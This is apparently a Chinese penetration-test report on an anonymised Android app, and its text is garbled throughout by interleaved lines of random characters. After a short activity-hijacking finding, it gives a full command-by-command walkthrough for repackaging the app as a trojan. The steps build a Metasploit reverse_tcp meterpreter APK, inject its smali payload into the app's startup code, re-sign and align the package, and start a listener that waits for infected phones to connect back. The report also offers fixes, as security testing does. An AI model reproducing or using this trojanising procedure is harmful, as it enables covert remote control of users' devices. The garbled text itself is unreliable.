' N* @( P8 U5 R7 [6 g4 V: b6 M ) H6 r1 q, `& ]( Z1 w
9 p- i" |8 e |" v$ ?2 `3 ]
/ X- e; t G8 t4 w: _; b4 p. k7 D& u9 j; A% n ?
5 }6 {7 l% A9 Y) P3 _8 T! P6 X0 p$ K
t! }% y8 K* `% o4 {* s 表1-2 测试结果
) q, q' y2 T/ }) w) I7 y+ k5 q/ J) P0 r! J
/ g3 N, A" f# D. Z9 v2 z0 o8 n
( K( _, ?) x' B/ j! Q; w - Q+ S2 z4 w; Q: v L) q
4 q7 F! f, \3 h! s
# p; J4 s+ Q: Q# A: ]% t% ^- g5 C5 _; k+ N9 J2 v
8 |& G/ ~* z, w" @$ ~
4 r7 U2 H; e5 [5 I, R' [2 ^; X6 s
) V! L8 X1 k3 Q
7 Q. ^( T w$ W 2 检测结果 ' o- _+ s; o1 ~4 f3 l- ^
: h+ V: H% L' c
7 d; U( k* L) ^( Z5 {1 M9 i7 D! S
) c) F3 A* G# Q
0 }1 h2 c- E" i/ o" c
* [9 L/ T& Y0 y' ?, p
2.1 某某某 8 I2 X2 U' |' i J/ M9 e2 A
$ H+ n; h* K2 A- w- G
$ Q! {0 S* {& h2 ]/ T7 W
! p$ R7 t8 {( o) O; i
+ Z: L% ~6 V/ I& q* m
$ a; U( [( X$ R- q0 n
2.1.1检测目标
E M/ {7 O' k0 X- a
& g) D- n+ F/ F0 z7 t
4 Q- r0 M L: c- v+ J: L- p, I% Z( h% o& D$ b
1 Y' ]9 t: ^ W# K( C
$ `: I" S! B: E. ~+ X
目标地址: 某某某某某某APP
% m! \# s( ]) p C- Z; m, W5 z, B5 s% f
, H9 Y9 y9 y7 |! k( y6 M Z0 a9 Z6 D
1 a( J* y) Q* X5 J: n) B! G4 h1 m5 N" y) d0 \ w$ [1 N$ I
* ^9 q: ]* b3 Y. x" q
. b- X4 k3 ~' ~6 s8 \ \ 2.1.2检测结果
( w9 D( o9 \2 m7 I4 \: M+ a) n4 p! U& B2 c$ o& K: l
! }# X5 T$ M# n2 N& u. S
, E2 Y& g- i* d
C8 j) m% x8 D+ S# A/ s" k4 x1 n
2.1.2.1
4 W2 h' U! b) I) {0 }1 k# d% R. k2 g6 K$ ?
" l; O; c: i% `8 u7 |* O4 [6 ]+ O
7 R. W1 T2 A# ?- m8 _. u" g : k* U1 p! R: d1 C( P: ]& e8 m
3 w5 f" s; P* A. u" Z: c/ V5 J 漏洞链接地址:某某某某某某APP 4 v5 H" C* ], |& |: D4 j" P6 X$ w
0 s, G# ?' A7 j* f) g
) P0 v8 g7 Z/ A! W' \
2 j/ M! d. Q/ H- P 4 H1 l8 C, i: M+ E
# X1 d8 t" X" n8 q3 L
: m- f1 l g# r8 F4 D; w# S8 ]/ K$ C4 m' [# \- q: e8 I: f
4 O9 z& ~. N9 L1 `
* h* l' D/ \' w5 \) o* K* w( z2 ]. s
7 l8 E% M8 F: S# B! U0 y* {/ E( V% I/ V+ }8 ~+ o! E$ W; R
漏洞分析及取证: ) v! ]& u" Z- Z! j
2 v0 E* H4 e& m' X! Y- k
2 @" O$ S( g2 t) `3 |2 X, B0 l
& _6 A z; Z8 V4 I% R( o
8 Q" S) m2 _4 C4 P
" d2 \! o7 l- c; j2 ?& z- T3 ] 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
0 o8 R! {5 ], w, T/ o# P( Q) ]; H% V2 ^
% i* R: Q9 R) M: h4 s
) @! y/ o# F. f
1 J; x) D7 h9 U5 N/ x3 ^( t) B' c3 w0 [, D. w1 ~2 B
8 j5 e( f6 x$ ^) L% K- y: ?! z% G
7 l; u2 C9 W/ O* u9 U! s9 j
; B3 C, _9 x4 t5 ]0 t
( v- i" Q' ^$ }' I* W) Z: q2 B5 |. M+ Q: m
7 Z5 B- U+ ~8 U, w P0 T2 Q) K" Y
! F; C. S* ]/ `+ S, n8 K+ S4 `
; u; M, Z3 L) {' a/ E; `% b
. Q4 ?& s- |0 d) G9 f4 Q* y ~4 h( q1 O2 M
, L8 P' G. J4 [9 E+ X, x. b8 r$ i9 d
+ e. A' H: Q z4 i+ ^7 u
4 l$ E7 {' h' T# @% S* ~# A7 @5 J7 c; V) L7 E
9 s" ]5 E+ @$ e, h! M* O( R0 c$ q
( G# c- J" U. v0 ^, R
" c: U! j- C0 l: U
R' v, S$ T( ^) @7 i5 Y4 X0 c
6 E8 n5 m$ h9 i4 h
7 `. I' C% Q3 `( E, s! x8 s ; x/ S+ z6 ~" @; c( [* b# @
7 l( n+ ~2 d# l0 S* t" a. v
) U$ n6 z. u( I, w, w, f) t V
+ p; W5 b8 j2 ~0 }
( U' r3 ~/ a. X+ J/ d# b1 i3 P" e4 o4 h4 U) l
/ ?; R/ h. W z9 S! j5 ?& ^( i0 N! Q4 E) Q: x2 h$ N; z) B
漏洞危害:高 4 ?% S. m0 u o; A. e1 ?
. w: P: r0 M) I0 @/ H
% K1 B; t* e' ^ U
) a( M! w. \% C0 i" E) u ; f) J& }5 ^/ G# h
! N! k6 K! j* Q 1 Y: m" B" g6 _& Z
/ k2 k0 r) R" P/ H, L& [
' z7 p) p: |) T4 Y% g c' U' ]
2 T/ i) Z9 [. L
+ U+ M+ ^ k& D, ]; D. {5 O3 l- t7 q! o& I
| . @0 F/ `" T; j' Q/ }
3 \6 q2 K1 o/ p0 m. E* t
- c# k e* Z( d' N$ y0 l6 z
" J# ^1 Y6 S& d9 f$ @3 F
严重程度 ( f- S2 Z v: S* ~) J! z9 S/ @
7 `' O( K; ?6 S& c) ] C
8 J/ K9 \1 X* |6 U+ T+ P/ e; R( p4 ]8 w3 K
|
+ f4 R" ~2 p& A% R! `2 Q, g
4 h& {0 i% o$ o" M2 r+ d) [2 T; n# Y ' R/ F9 ?$ A8 L6 }) T
: e" @: x. V' @& ]3 e + G; P3 a) U3 K* e3 y
+ e7 j Q; L# W' |8 S* F, J2 l# X0 Z( z
高 6 O; \% d! C& E3 i
6 Q7 C p8 g, j9 i6 D5 O" f : O3 X/ A; o# m0 u6 q
" B2 K. ?# t# [4 h | 2 i- W/ b- N( u+ b! y+ U! _8 E
& }; A& C( \0 Q G2 E& R$ C7 f # f$ [# U6 C4 o$ G
# j3 F- x4 b+ E/ a! V
* o) m- c) r3 ?" l) a2 {/ T7 m) @
2 L |- s, H7 }$ M! W4 U! ^ ■ 0 l7 s6 S" n* L( _5 G; [& v& l
, K' j1 Q, i2 F, h c' t' {
. N: W4 f9 w" l& i# P
3 c- o3 f. y; R V8 `0 S! L! ^ R |
5 ~, u- ~- ]+ J5 |& V4 Q, W8 o" V7 ]9 I" ?. l- y u
W- T# U O& f6 _) |+ f7 i4 e" F
+ P {. E1 S& ~7 Y8 K, ?1 W- r% n2 f1 c7 E
中
/ r: ^ a% R- x7 Q+ Z; w+ r( Z- \( Y$ y* z1 C* y
! m9 Z% U3 O. N2 V j5 ^2 T$ [# H3 V/ F% r
| ( }% r% m" e, o6 y
1 u8 e0 F3 F1 t* D/ v5 j; E
; K6 d$ U* E% b/ c& q
; F) u* L5 j+ ?8 m / l7 W! Z; m' ]+ A# m% h0 u" J
0 J- v& c$ M# H1 Z
$ l$ L, u& p( \! X8 T& y7 o
) I1 v* G. U) t1 S
3 J$ \) \( w7 A, N- _ F I- Q/ q7 O& p/ i" D# f
| . I! _/ ^) b- Q2 i& P5 U
/ s5 N/ A" V) j! b4 N
* ? G$ R/ w ]
5 s$ g/ [) [: N6 x* R
5 B% e" h7 G6 M q: @! _9 \2 d8 O1 n4 r! @7 a- e2 u: ?# K% h# Y0 M5 e, |+ l
低
. j; A, f- x5 u* o
9 e: u4 ^2 Y$ S% a0 X! {7 f . u& ~8 l2 w, _* X/ }
$ y9 O+ X% P. y9 z | 4 O3 n1 O4 [2 p/ |
- K$ X' I( q6 V9 C! @/ m T6 ~
3 [" Q! ~' Y A1 J q' F3 ]6 E2 H; ~
% F' g$ f' {% T( r& \
( a5 t' C ] ^+ q+ H# [( R8 X- H5 j) l
4 k1 F4 ^, T2 Z0 K* F
+ O( H6 Y$ v1 L" H5 W ; J" y% r% V2 V8 Y# Y
; a5 D I: i3 ] | - g |, _8 m/ w7 y( i( k
R3 |; Z3 D" x8 K, k
- @2 l* B& t; t9 l$ G; w8 o2 F* L$ F- G& r( I* z
i% [* c& B! X! y1 y, @ R: v* p
" H' P4 b, |9 I. a, ] u. U6 S- D
+ ?/ y2 |! Z1 X: C. p, u1 J+ @$ y7 o# i
( A Y. D) v) p6 x' D
+ J3 C, }+ {! V4 l% |! ] % z: S6 }, _" D, k
0 D: B' O, d* G$ t
3 N0 K# [' B: h# d
& _ o- v9 } V( F7 i* A
e8 _8 @! r' h0 k
- ?8 e9 o4 g8 t ; W2 X! p" g% w. e- [
% q( b& K5 ?3 g o# Q+ G+ N
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
$ |! n- p+ G! F- I0 c" K" \# T |$ S# Z& O- T
\, t8 l S2 h# E3 G" H
' O* c: f5 J& i' g" e 8 v' g7 G1 Z0 i' ], e
$ v/ _8 \4 a& O% R" S
1 Q. v p! ^5 L/ A- _+ a/ u4 c2 z1 b- e8 g% q: m
) p1 z# x8 c1 _: h: Y$ q. a2 t
* L5 [& r, p# N/ ]% D5 }: Z; ]& B
- A0 e# R. L. F- y% P/ t" C; z5 M+ j' v8 [
4 v k+ [. H4 J; C6 h2 ]
9 z& n% W0 H! T' G' N9 |
8 i* @$ Z! ]) q* U4 {' C" x/ n4 G9 L( ]
- N% b0 c/ A# m3 e ?6 A( C2 K- O3 I; J
2.1.2.2
- a' q2 E% J1 W, k
9 P4 k0 }" k) v5 t# Q4 S
- l$ o( P# g& W! Y% A" W( @
- ?0 L8 J! V. j- Y& b. ^
' M* x6 H" I3 ]
) o$ E" n4 q; E! L( j0 E4 l, ~
漏洞链接地址:某某某某某某APP
3 Q9 Y- s G0 o. j+ }. I! J3 e! _4 ~' y N: T0 G9 c) e9 O7 K6 \* m
* d$ ?2 K/ o5 y& h( y1 w' L' q6 t2 l. J: i* T
) a- O" l& e: E& S& b
4 q) |6 Q. g# U% f& t 漏洞分析及取证: ; h$ w$ r- L1 ?5 n: j" H* [
* o% O I* _& Z/ b( J+ n
" q( [/ e0 m7 \
* a& n$ r+ O# S g
+ g5 B/ y4 v6 _& [: ^' n) e; l" x& h+ l, t+ z4 ^. A" F
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ) k% {: M3 v; M1 W
; R \) o/ B$ L h6 [: q
) z8 n2 {3 O% ^5 s9 }
3 g: o- E. K: a; ~- F& L
- S- n h2 i, i4 R4 Z+ X: i9 A& H( _; E% A1 k0 ~9 L
用Metasploit 生成木马 apk
2 b; Y( O# f- u+ P' X4 g r8 }; h; M! m% _' Z1 s
4 ~2 Q( Y x5 R1 U. B, `
8 X0 z4 v3 b9 p# J& W; m- K$ J9 S $ X* J7 }* y" A9 s' n. M. _
4 F+ R2 m5 w) U, h2 D" { msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
: _1 K/ e- F( r7 E2 |, |+ e
, H Y6 B4 e1 |1 O/ l( Y/ I
6 S( q9 }/ H7 q) s8 G6 d4 `1 g3 v5 _+ H7 B
+ E- H1 ^; [3 s
5 a6 S: O. {: N8 @, E 反编译目标apk和木马apk $ F* ?6 `- `3 O H2 y& P5 i
+ C1 x$ D5 B% C
' T4 Z3 _1 U% _, q# F9 }/ ?
* h; K6 e) s/ u: V# @
8 R6 y' h; M k; p, A9 [/ y) h" `$ ] S3 g1 n
apktool d target.apk
4 c. w5 @+ Y% r* f; Z; r- c: _, F! G
apktool d cockhorse.apk
* O0 ^# B# K4 H( x
. O" W: ^% ?; s/ _ j h, v4 H
; M# M7 ?# }; W. ]9 P" D
2 D' X0 V$ e9 q+ J7 G0 }! P3 ]' X ; g8 d4 \: Z& W/ Y; Y
' Z R, | |" ^( x2 d9 D
木马 apk 注入目标 apk
, K. w! O1 ~, }. J! C0 U
4 }3 v. \% Z( ?
/ r$ s+ t5 h& _ Q6 q
6 _1 q5 r9 i2 d: S0 d: L9 b
5 G) r7 @* C1 k9 a
I6 v5 W$ [0 O: P
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
$ y* ]% D- T& W1 x) w+ d: {! \$ V1 }
7 @$ @ Z d, A" e invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
0 T: m+ i' {) q7 K/ y# h9 Q# X1 W. W/ t8 U
; c4 b+ t2 s! l0 k9 ~ q! a; i9 z
" c. S; X9 e( L( y B8 N5 O# N, k
. f9 g0 D; P3 Z& H
+ s+ m" _4 w* b( b3 e, ?; l 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
+ Z8 M! F" K, R2 R" v
4 ~+ u* m( D, T G
; W" b" Q; ^. L) D0 \$ N# K: O5 Y6 L0 ^- |
" z5 I$ Y6 z, k- e5 [% s3 C S; k8 X
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
3 w6 W) \/ A! \6 e' m3 X0 M1 E5 ~
! W! ^% x9 g/ ~( d
- n4 B3 @7 o" }# |$ V w 3 S% @; y8 T: [" c) G
% M8 _: x! d6 E0 a& @ i
回编译生成最终 apk 4 J U$ F# E* t) @/ A8 a- z
$ ~! U2 E& h, C7 `
. Z ]0 @5 t4 C2 N8 v6 [6 E& I1 g5 Z. p% r( D
$ t0 V7 ^" W5 W0 d' r4 f* g- N
5 g& r1 S6 A: n
重新打包 / m$ f- o7 D! Y+ y( w
% D( D8 g$ c# [
3 t+ u) f7 p( Q9 |# ~- m
- l" r: t: z6 ^0 R
4 A; h4 i' L0 @0 W/ D3 c8 u1 g. \* W( F6 A8 l/ @4 e
apktool b -o repackage.apk target_app_floder 5 N- m+ t2 Y# G5 B8 v8 _
; Y- Y( ]: e1 m
- x& D- Y5 s" C2 S6 e
+ e$ E! D# Z2 j6 K
# A4 @7 h) @0 B X$ \6 V/ k0 R$ p$ R; L
创建签名文件,有的话可忽略此步骤 5 w+ R" K' i2 j! x' w
. I% ]- `$ B; q6 h. A
5 D5 B: E) r& {$ y: v7 i
; _$ @& T3 m% P+ s6 m2 e0 S / Z: o: m* z. A; H/ E; c# \
! ]. [) v$ K0 _4 J
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ! T, l% Q( ?8 Z( m! E# \2 y, S7 B M
! v' w+ g0 a- S" H7 T
_" z; D( g# V
; ], s6 \; L8 S
( f/ y" k& P2 @ W9 v+ ~
+ }' ?. F5 I- v. |: k+ H+ h 签名,以下任选其一
5 ^. E7 }" p; R* [1 v! W* g" q! b/ y2 x( Z1 R) \, b4 `
( {2 X, w: a4 N+ S+ w, U3 c
* m+ ]8 u0 a! a# S. r9 O3 A9 w
& F, {; L( `* W, E; j, e* Y4 p% ~
s+ m7 F3 t! U- \0 i) V0 I jarsigner 方式 3 e6 Q' b# ^) \: @
6 @* l* P$ i5 q5 O, y
* W$ F {$ G, b; r' g
& O% d; y4 S6 M 1 L; G' c3 Q' L( X4 G
4 }6 N, C9 X/ Z6 b( I
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 7 ?7 G! ^9 Y8 h; w# ` x
% Z! I8 E# ~( x K* T$ n# X
5 a8 L2 r* T( ]8 n2 C
) J. t; P- U: m, [* u+ q0 z 1 I! Y4 z6 @2 t- X$ n
1 e6 f- }/ {% F; J: X/ X ^% i$ D apksigner 方式 * c/ ]* D* _! i0 X" }" n1 L& n$ ^0 f
* }( [$ v# t- g* Z3 {- l1 w- p
) w: @; Y/ R! U! O2 x( a: }
0 S# a: j0 L- J; r7 D- _& v 9 c0 s% I+ q1 P3 {6 ?7 K3 h- G
, n9 X: p. ?* g( ]
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
* F* N4 u# C' W0 A0 B" F. }2 B4 c* R( d0 L+ x
2 `# x- {9 F- r, [- j
# P L/ }( B8 t1 [ ( S1 `" E" d5 E! K8 w# J! F
& ]* ]% H! ]) x0 I5 O) M8 |6 ~ 如需要禁用 v2签名 添加选项--v2-signing-enabled false
1 I& \' t8 a% u3 R, X/ h: E0 w- @# x1 X" y/ r7 R3 K' ^
! C1 N) c, x O+ U, n$ W, _& [; g. x, h5 m7 o: z
6 V" k9 q+ e4 U6 Z3 R
, f" R" R, e0 K+ M5 U4 `5 R 验证,以下任选其一 * X0 p, x: s7 W, i5 k
+ B& G- C) u* w# Z1 e
3 ^9 I; m. Y# b3 D6 s: k( l
( ^& M* v6 G5 k5 d; y4 E
3 W" `# l/ C0 r5 A% O6 ?. {# N9 q7 C+ H. [
jarsigner方式
2 z3 Q. O5 v9 B I
! I2 U# w9 m! B% D1 ]
+ T1 U+ \+ ^, M; {
; X4 t" b4 [. o+ ], x$ E: o* o 8 q# w! G! h# F
* s1 ~" b# z1 {3 e
jarsigner -verify repackaged.apk 7 @. F% p9 a; G& I
+ X8 L% O& m* @3 C# I. U
/ u& i9 ]( z; @( H9 ?$ E5 \5 f6 ^" W- d+ g& V! u) B8 x
* y! v3 u5 M4 N& G" k) ?
( `, ]- ]; s( q! f' |4 M. } apksigner 方式 3 C- ]' f X: a
8 w# s0 m6 k. G" Q
% ]2 k H0 X1 M/ ] G, @2 W
9 y+ R- Y! F& E+ j2 D5 D
0 K' `- t2 o! V5 R- X1 x
; r7 U+ O! Y# U* f! t apksigner verify -v --print-certs repackaged.apk
. H( X+ ?& t% a- ~8 i# d/ H2 ~: h" j" T% |4 \
6 W! a" R: R: w' }9 T
/ l4 C; ~# Q& ~* ? }: q
) F! {7 m8 x7 q: _9 E. U* z$ p8 \( ^
keytool方式
' Q5 P2 [ R: x* E- X R
; b1 R/ y$ q" U8 z
8 z% @) c/ T7 G% _/ W7 \* O
+ x/ b. o1 d! F# V
; Q! h, u% J5 @8 ~
# p/ C5 j/ V7 _( `* C% |" [ keytool -printcert -jarfile repackaged.apk 1 P. U, t+ Q6 @# n9 X4 K* L6 f
, I G3 j( E! h. M7 F) X
8 X+ I7 U* m4 J# W# H) ]
4 C, i' @8 Z. a# M0 K. K
) A) w: N' I6 l& f$ A% g4 l6 u1 q) l
对齐 9 M: t; F) F5 M5 t/ u8 W
+ n. s% h6 Y! f! q% F i
- g3 t9 l: c+ T& u. x% x
, C- |0 R+ c$ \) e# ]* g$ z1 R z
# D" F7 K" g% I4 [2 K* D( X% r5 h7 p0 ~5 }* }% ]
字节对齐优化
5 R/ L' s0 W% n, r5 ~4 F: z8 m& n
' B5 ?6 P" m/ A1 n7 [& J
% d. H5 t/ P8 |8 C
$ C+ m- J" e; F b& e; U7 r
5 J; d. |4 n- S7 n' u% D zipalign -v 4 repackaged.apk final.apk
+ ?# I4 Q3 g" T% K x. k
3 ~2 G# m c+ ?5 l6 L
1 u' R3 J4 s8 h! s: [
4 C; ^( m( E! P) N+ l
5 H; n# V6 r9 ^0 w/ G
+ `+ v( p- F9 u4 a7 W2 o
检查是否对齐
$ P. G1 j+ m! k, A4 S& b/ K j; B5 ~( l; r" k% C
3 f5 r# ?2 e# |. {' V: Z
& D" [+ Z7 i; _* D6 n4 o3 d& O
* p5 N8 R- H! O8 y3 M1 f) {* L8 ]
! ^+ F+ F/ n. T& m9 q8 K1 m zipalign -c -v 4 final.apk $ `! @) h; {5 D( o1 [+ S
$ j; L- b1 K: [! g. X/ S
! V& N9 R- `9 a( E( r# e. A! ^
5 t( L4 p3 a+ _ M5 s7 q- K & ]+ w) m% ]4 G1 ~3 G( ]# e; ?* D
+ ]( s0 |' ]! K, _/ f7 W/ k 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
# g6 `5 z* q" }; X6 L
1 a8 q0 P9 F9 m* M; M
4 k( |5 d9 V, L# g8 j" [
$ a9 Y; j3 p) L2 h# {8 E. w
1 J1 u) O% U0 }9 `4 u) }9 |) `% m2 l$ y* K( z/ `: Q: e
启动Metasploit控制台,配置参数等待上线
2 I5 J: y8 v' S2 ?1 f U" n) E" y+ Q8 P) R' |1 E! O# F: U. ?( ^: d
6 b$ ?2 L' T( g4 X
- K8 ?/ L% w" ~6 B. m1 D
" \/ } O8 {0 A1 m; O$ M
9 {( b' A9 l* M: M5 ^7 Y 在终端依次输入如下命令 - ?! h$ W3 A; s, z/ y9 N
h& i; u& q: ]/ N( J6 t
0 e+ b! X, s8 O1 }1 x0 S5 m* Z7 F9 R
, H$ z) t6 H8 ~+ Z 5 m) p+ t, u2 N
2 a" P+ Z: R( \2 q$ y: x1 F
msfconsole $ r) q8 C- L$ ` e1 ]" {; v+ K8 B
: s7 |" S' C: w* j1 U' ^3 L
7 |! ^- \2 i- x
" C& J. N) q: R, Z
. n) }# d* [4 z' i* e6 f& p u6 A( w
- n, t j. G* V3 @# A4 K. s- q' t/ l use exploit/multi/handler
9 T% G2 X( u: z }; |8 d" d8 C2 V+ F. i
. @% j q3 e: n3 Z! R+ `) s
' H3 C7 P1 e# k' q+ K( {$ ~+ V
+ Y# x) E( ^" H: O" n/ P% `! P3 {) U3 s* N" K, K; M( |* q0 G+ _ ~
set PAYLOAD android/meterpreter/reverse_tcp
- R6 i& `" \5 m, Q3 Z: Y; Q: Q8 J+ q! b
4 X K' l5 r6 F/ H1 s5 i
5 V. ?$ t8 ~1 w5 W
( _: s. E }9 r& q, d3 y/ L3 L1 f" F( c
set LHOST 192.xxx.xx.xx 7 E4 @2 |/ H% B6 v# ?
0 n& C$ p7 m) W9 H; t' ?, i
[$ s* _8 j, I* R* X
; j! w% d9 s/ a( b. o: B
s( C# M' G) [0 a' l
2 J+ H# z, F9 s- m- \
set LPORT 4444 ( G/ w4 B# y9 e" f, d
$ h# W5 T) G7 [$ U+ X3 Y5 {/ z
9 J% R. B4 i9 `4 k) N
% B5 |) `4 F: Q( w) ^1 A$ d _2 X5 v4 w2 F3 |
1 ^! Q( n2 B/ k5 e% r2 V1 i
exploit
+ q5 y$ N, j) k! g5 [" I& E! o$ p( y5 D8 M5 H2 O! @9 o
' z2 J: u9 ]) b$ P, Z. O) p
0 a6 ~8 U# S0 e5 R2 f* X
3 V, }2 f, [, g/ `
9 Z6 y" W! c8 k, q. W& l 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
8 g4 Y$ P" u7 v; `5 ~$ t2 O, j
# A4 ?2 c: G! j0 p3 Z* C
1 J% h8 f1 d: M* V6 m
1 b% ~5 x) U9 Y " E( B9 ^& X/ U2 g5 Y! B
! L2 t# P2 j7 t& i
漏洞危害:中 $ f& N: W! H8 y+ n. {1 W! N
+ A3 f+ K- }2 J( N# K. }% \
. I( u" ~0 E" @9 p( Q4 a
9 y8 E% K6 ^9 `% m. @' {" P . L% B. K$ T" \- P. E4 e
! G! |& C: ^5 b3 P+ {
) s" | e& g; a$ G5 M8 m& q5 v5 J! F0 @) G( C# i
6 P! t; f1 k9 A2 y% L& t, G* m
/ {: O3 ]% h: [+ E$ i9 l " e9 z0 g- E( C' ]( P' ^
9 U; J1 H7 V# o! f" s6 B6 j ~
+ n0 |, j( d8 Y; X) x8 q
4 J% m4 t$ o& m. T# L |
6 j/ S7 a, _" z+ S) f; d1 `- Z& B( o) x1 w: x! G' e) n
9 R: k7 z) Q6 Q( F! d' ` I
7 }4 d8 _! O1 [9 f( O$ m3 i' g9 h& j 严重程度
* u* h' Z$ E9 w6 r. t
9 `+ }, g$ V7 F8 M% ~ , q+ J. [. C, l4 @
- f$ z4 Y. M9 Y# g- A. c$ x2 {/ ] | - W/ M/ S, J; U& {; U
- u, b7 \$ S5 g& N7 F ( i6 X2 r% {# _7 H' R, w+ W
6 W3 ~6 B# n! }% ^6 _
* N' Q+ v; v, v3 W7 k6 N; `5 q( W9 I0 j
' t$ l8 u# B. i' K: F, { 高 _+ [0 f2 K- t; ]
* D5 h, t. Y% t4 Q3 P' |* P
1 u9 |9 J) {+ w5 Z. |( c/ B- v& {7 \$ X& b
|
3 H% V- M c; A' s& ~. M8 z
; _8 O9 w" |6 v) D; E
1 Q, \: N# x8 s. M& ?3 f2 Z2 ^9 P5 V) u4 ]8 Q% O* ~$ n& @0 q
3 |+ ?" ~+ E, p8 a
: f9 @2 b$ g! V" a8 S* i ■ % n( e7 S* Q g$ m$ U# {
" z7 j! N: ~( m$ u8 V6 @7 q6 U/ V
; G; ?$ V* M- ?) E
# `6 r; e! w) a1 F5 }( z
| : E$ W4 G. B4 Z! k" M
; n' D9 E6 z7 q
/ s* K/ o8 J4 n2 j ]
3 A4 G* k! D( `7 k! j: e6 w! _$ \
2 U7 j2 O6 F, t# r# P# [) a$ \" s, m K8 j/ ~
中
5 c; S' ~5 u0 H6 S R# o- c: @3 p* _8 P3 Z4 Y" _- e
. u0 A& A& o0 C% w3 V9 S4 C$ h) E5 W3 x8 T0 J# C
|
7 s3 t9 ^' f v$ Y, V( Y& E' o8 z/ V0 R# @+ r
! {3 b+ t# l) b2 h: P
* Y' {% s: m9 B, G
" j& U6 f2 b0 o" w/ W% v& r; W+ s, W$ A1 h, D) i& A
( h- G3 i0 z @ _; t- l. X4 c1 ~) ^: K4 n
9 i4 G! n7 Y0 g1 v" u9 q: L& d
! @# Z& o! n+ ~, k8 N
% K- o9 S, H! `/ r4 C' e% W R& Y: }
|
( G3 c' G8 |" z* n8 ?* `! v0 ~
! O2 D, ~/ l. r2 t# X
0 B5 }7 x; L0 G, P$ Z3 ^
& d7 U0 M" j* ^. w( } o
# _. I2 _& Q& L3 u1 D- x5 L) o" x: q2 c+ O& N( h V
低
1 N- A5 P3 e+ n) K4 n. A
$ |+ S' O, p$ ]. U! E- X- d
- m) _# Z0 ?+ v) F" j9 y( h6 V% o/ {3 W
|
: z4 b/ a- Y" n. l, k
) |* d3 g, x# _3 q! v4 _
- Y1 b! m. ^, m) d3 I0 P6 n2 r0 I. Q' k* }5 T1 i) W
( r6 r! w$ a& v; K
3 K) A, D3 d* L! L ' E3 z( @! l. L( u2 J
, D- K! a. L- ~7 T: [; E
- J$ ?, X0 I: B& q0 Z8 {& g
5 G% H; X, O& _, ]
9 K# I7 I: D+ G5 G7 ?
. N% ~% S' q4 J9 L | 7 }- d' Y/ D/ U) F
% v8 N* u# r4 a3 v7 e
& J2 \9 a7 }1 o0 Z, ]
6 v1 ?% b/ E3 w; H/ n9 J8 z( B
?0 {+ @, R5 d, O1 }- n# ]
; \% Q) G4 x6 d# C
$ \1 J( [/ J4 G0 t) x @
( E, X# Q, w) s. B7 S
9 G+ n7 c9 U, H- {5 ?. h8 B) a9 g
- i j4 c4 \1 q. [% V
/ F, {3 V" {- q1 d6 ^! Z
7 i& q' U. b. X1 l8 e$ N& w+ g0 y+ b' M2 ^3 J
* h8 o9 A: T# D4 l# a5 b' H- \; c* a
; \$ x$ R4 j3 ?* x
8 v" v9 u& n2 h
/ m9 i$ b( `0 C7 v6 U3 F3 Z6 k$ d 修复方法:
$ ?3 c+ D- m3 c5 U; }! E9 F/ A/ V/ f4 H0 e5 B
# A) K W0 r, \2 ]( k. F
- y; l6 T1 j. S * [+ I; X; p( M1 {0 c/ `
5 ~) _- A- q7 i% [% [3 b& n% [/ X6 L 1.在 APP 启动时应做签名校验防止二次打包。
* ?" S5 L' K, T+ p0 D. D8 h1 Z; j+ L
q( O: s+ H$ u; C7 Z- O$ d- c' h 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
" X( D6 t+ f2 b3 Q, ~: e
( ]! k; V" v& _% F+ S) k
" K5 Z- @0 i# F7 u
1 [$ ~$ ~. `2 _" ~; ]; K, ~' y
4 @0 m$ W& s9 m
! H1 j8 A p3 X: \" n2 w/ |9 S 2 a* h6 e7 x- V/ H
; V# l, Q2 k0 b# C4 R/ u, M) u& L 5 e7 S5 u/ |* Z2 ?# l( k* w2 p" W
- ]+ h% w/ v+ G
5 ?7 d/ j) v" D0 g$ c6 l6 s
/ e- I: T5 K6 S2 U, {6 f% S$ f4 }
! T$ S0 F! f3 @' n$ i* ]; D
e; y B3 Y. l$ }0 A. o* E - W- b* ~3 x; A4 X2 F
+ j+ B6 t' H6 F$ P
2 k% @' l$ T# Z6 K( E
' S$ F! ?. _% Z; v
- u8 n; C* h- q( T( N
) Z" R0 L3 w1 l6 b- L8 ^6 V